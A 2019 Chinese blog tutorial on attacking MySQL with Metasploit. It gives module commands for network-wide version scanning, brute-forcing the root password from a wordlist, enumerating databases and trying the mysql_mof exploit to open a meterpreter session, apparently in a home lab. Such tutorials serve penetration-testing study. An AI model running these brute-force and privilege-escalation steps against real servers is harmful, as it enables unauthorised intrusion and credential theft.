使用Metasploit(msf)来渗透Mysql - JunMo博客

JunMo的博客

2019
记录生活
首页 » KALI » 使用Metasploit(msf)来渗透Mysql

使用Metasploit(msf)来渗透Mysql

Mysql介绍

MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件之一。

判断数据库版本以及是否可外连

use auxiliary/scanner/mysql/mysql_version

set RHOSTS 192.168.0.0/24

set THREADS 50

run

如果允许外链则可以显示版本号

暴力破解Myslq密码

use auxiliary/scanner/mysql/mysql_login

这个模块需要字典,我这边自己新建了一个。

set RHOSTS 192.168.0.103 设置IP

set USERNAME root 设置用户名

set PASS_FILE /root/password.txt 设置密码字典

set THREADS 50 设置线程

run 启动

破解成功就会显示

枚举数据库信息

use auxiliary/admin/mysql/mysql_enum 使用模块

set RHOST 192.168.0.103 设置IP 

set USERNAME root 设置用户名

set PASSWORD 123456 设置密码

run 启动

利用Mof提权

Mysql5.5.3(phpstudy)以及5.1.68都没测试成功可能是我环境问题

这个模块的用处是通过用户名和密码可以直接返回一个meterpreter会话

use exploit/windows/mysql/mysql_mof

 

文章如无特别注明均为原创!
本文作者: JunMo
转载或复制请带上本文地址 http://mo60.cn/post-50.html
并注明出处 JunMo博客
原文地址《 使用Metasploit(msf)来渗透Mysql
发布于2019-7-30
收录状态: [百度已收录][360未收录]

分享到:


打赏

评论

游客

看不清楚?点图切换

切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册